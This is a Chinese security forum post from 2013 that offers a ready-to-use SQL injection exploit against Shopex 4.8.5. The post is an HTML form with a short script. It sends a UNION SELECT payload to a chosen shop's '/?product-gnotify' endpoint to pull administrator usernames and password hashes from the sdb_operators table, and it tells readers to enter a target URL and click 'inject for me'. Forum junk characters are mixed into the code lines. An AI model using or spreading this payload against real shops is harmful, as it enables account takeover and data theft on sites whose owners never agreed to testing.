找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2035|回复: 0
打印 上一主题 下一主题

Shopex 4.8.5 SQL Injection Exp 0day

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-23 09:20:52 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
<center>
& K; a7 ~$ S  U$ I<title>中国网络渗透测评联盟-中测联盟|-Shopex 4.8.5 SQL Injection Exp 在线版</title>
; d) [! i% {5 u' ^' O<form action="" method="post" name="submit_url">
" [& ^- r. P, p8 h! j# p网址:<input type=text name=url value="http://www.political-security.com/" size=62><br><br>
4 r  |4 s7 P' `; L+ ^<input type="hidden" name="goods[goods_id]" value="3">5 `6 }' Y" X, N4 {2 n* O, h
<input type="hidden" name="goods[product_id]" value="1 and 1=2 union select 1,2,3,4,5,6,7,8,concat(0x245E,username,0x2D3E,userpass,0x5E24),10,11,12,13,14,15,16,17,18,19,20,21,22 from sdb_operators">3 ~# c+ e# z* ~3 v1 w
<input type="submit" value="给我注入"  onclick=fsubmit()>
. z5 w, ^. K* u1 ~7 |) P</form> <br /><br />填上你要注入的网址(注意要打上http:// 要不跳转不了) 点“给我注入”就要以了。//www.political-security.com
- s/ p4 B0 X/ O& D
% V3 @5 v4 C# f5 ~+ r" k<script> 3 r' K; s, e  w% X. U+ o
function fsubmit(){
: C* c$ B# {+ n& ^4 Eform = document.forms[0]; # K7 y3 j: X: \- C! L- e: `! R
form.action = form.url.value+'/?product-gnotify';
7 i/ t- f% C  D; W2 `form.submit();   w( n: P: P) t* |- [7 d
} ( `6 Q$ [# J1 s5 }! j( C( h1 a
</script>
+ F, s. S' G+ [  \5 s3 ?/ O8 T
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表